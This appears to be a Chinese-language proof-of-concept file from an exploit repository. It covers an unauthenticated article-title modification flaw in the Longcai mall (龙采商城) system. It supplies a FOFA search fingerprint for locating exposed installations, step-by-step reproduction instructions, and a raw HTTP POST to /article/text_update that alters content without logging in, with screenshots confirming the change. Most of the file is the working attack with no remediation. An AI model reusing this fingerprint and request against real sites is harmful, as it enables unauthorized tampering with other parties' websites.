POC/wpoc/龙采科技集团有限责任公司/龙采商城系统存在未授权修改文章title.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

40 lines
1.8 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 龙采商城系统存在未授权修改文章title
### 一、漏洞描述
龙采科技集团有限责任公司龙采商城系统后台未授权修改文章title可直接无需登录后台后即可修改文章title。
### 二、影响版本
龙采商城系统
### 三、资产测绘
FOFAbody="'url':'/pc2.0/index/index'"
### 四、漏洞复现
<font style="color:black;background-color:#FFFFFF;">来到帮助中心随机找一个分类标题F12查看其article_id记录下来替换掉POC里的id值请求POC更改data内容建议以原来title内容+1作为区分攻击后记得改回来刷新页面发现标题已经被更改</font>![1715916930434-01af42c1-1705-4129-bce4-57431e8393ec.png](./img/pw7d7qCzBp2HBEtJ/1715916930434-01af42c1-1705-4129-bce4-57431e8393ec-209105.png)
```plain
POST /article/text_update HTTP/2
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 39
id=77&parameter=title&data=常见问题1
```
![1715917138219-9cb3910f-288b-4aa9-b705-aea33fb47217.png](./img/pw7d7qCzBp2HBEtJ/1715917138219-9cb3910f-288b-4aa9-b705-aea33fb47217-081146.png)
刷新以后发现已将"购物流程"修改为"常见问题1"
![1715917093672-79d7e39f-f182-4866-a2ef-8dab2a76b49d.png](./img/pw7d7qCzBp2HBEtJ/1715917093672-79d7e39f-f182-4866-a2ef-8dab2a76b49d-426834.png)
<font style="color:black;background-color:#f0f2f5;"></font>
> 更新: 2024-06-01 11:14:22
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lvt3fs0uh5qmnvyc>